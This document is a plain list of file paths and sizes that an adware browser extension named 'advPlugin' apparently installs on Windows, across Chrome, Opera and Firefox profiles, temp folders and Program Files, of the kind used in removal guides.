C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ml\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\background.png (109 bytes)
%Program Files% (x86)\advPlugin\files\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\background.png (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\bg\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\skin\styles.css (257 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CC.tmp (139128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\th\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\mr\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Content.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pl\messages.json (341 bytes)
C:\Windows\SysWOW64\GroupPolicy\gpt.ini (330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\de\messages.json (338 bytes)
%Program Files% (x86)\advPlugin\BackgroundSingleton.tlb (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ar\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\vi\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\da\messages.json (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\tr\messages.json (355 bytes)
%Program Files% (x86)\advPlugin\files\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\am\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ml\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\lt\messages.json (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.css (192 bytes)
%Program Files% (x86)\advPlugin\files\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\fi\messages.json (346 bytes)
%Program Files% (x86)\advPlugin\files\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sq\messages.json (366 bytes)
%Program Files% (x86)\advPlugin\files\Kernel.js (784 bytes)
%Program Files% (x86)\advPlugin\Basement\ExtensionUpdaterService.exe (5203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\manifest.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\Chromium.dll (6776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\be\messages.json (437 bytes)
%Program Files% (x86)\advPlugin\Uninstaller.exe (5675 bytes)
%Program Files% (x86)\advPlugin\Toolbar64.dll (12024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\uk\messages.json (476 bytes)
%Program Files% (x86)\advPlugin\files\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\uk\messages.json (476 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\mk\messages.json (428 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\arrow.png (332 bytes)
%Program Files% (x86)\advPlugin\files\popup.html (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\files\background.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_GB\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sq\messages.json (366 bytes)
%Program Files% (x86)\advPlugin\files\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\cs\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\icons\icon16.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fa\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\Interfaces32.dll (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Preferences (8591 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\sq\messages.json (366 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ar\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\cs\messages.json (331 bytes)
%Program Files% (x86)\advPlugin\files\_locales\da\messages.json (345 bytes)
%Program Files% (x86)\advPlugin\install.html (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\bootstrap.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_BR\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sk\messages.json (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\Kernel.js (784 bytes)
%Program Files% (x86)\advPlugin\files\files\foreground.js (3312 bytes)
%Program Files% (x86)\advPlugin\files\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (39174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\it\messages.json (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\background.xul (452 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\nl\messages.json (362 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\install.rdf (16 bytes)
%Program Files% (x86)\advPlugin\BackgroundSingleton.exe (22552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fil\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\hu\messages.json (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ro\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_US\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.html (199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\icons\icon64.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ta\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ca\messages.json (352 bytes)
%Program Files% (x86)\advPlugin\install.bat (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ca\messages.json (352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\popup.html (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\bg\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\Content.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon48.png (3 bytes)
%Program Files% (x86)\advPlugin\Interfaces64.dll (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\tr\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\KompexSQLiteWrapper.dll (19644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\bn\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\update.xml (473 bytes)
%Program Files% (x86)\advPlugin\files\_locales\uk\messages.json (476 bytes)
%Program Files% (x86)\advPlugin\uninstall.exe (58402 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\UserInfo.dll (14 bytes)
%Program Files% (x86)\advPlugin\files\_locales\he\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\lv\messages.json (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\gu\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\foreground.js (601 bytes)
%Program Files% (x86)\advPlugin\files\_locales\bg\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\te\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\advPlugin_restartonfail\InstallAfterRebootService0.exe (5110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\vi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\zh_TW\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\background.html (69 bytes)
%Program Files% (x86)\advPlugin\files\_locales\id\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\popup.html (361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\files\proxy.js (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\background.xul (452 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fa\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\fr\messages.json (371 bytes)
%Program Files% (x86)\advPlugin\files\_locales\mr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\el\messages.json (463 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\de\messages.json (338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\zh_CN\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\icons\icon64.png (5 bytes)
%Program Files% (x86)\advPlugin\Toolbar64.tlb (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt_PT\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sr\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.js (3 bytes)
%Program Files% (x86)\advPlugin\install.inf (278 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\styles.css (257 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es_419\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es\messages.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\sl\messages.json (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\no\messages.json (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\bootstrap.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\sv\messages.json (344 bytes)
C:\Windows\SysWOW64\GroupPolicy\Adm\chrome.adm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\popup.js (659 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\en_GB\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\Loader.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\es_419\messages.json (371 bytes)
%Program Files% (x86)\advPlugin\files\_locales\pt\messages.json (349 bytes)
%Program Files% (x86)\advPlugin\files\_locales\sw\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\am\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\en\messages.json (343 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\ms\messages.json (341 bytes)
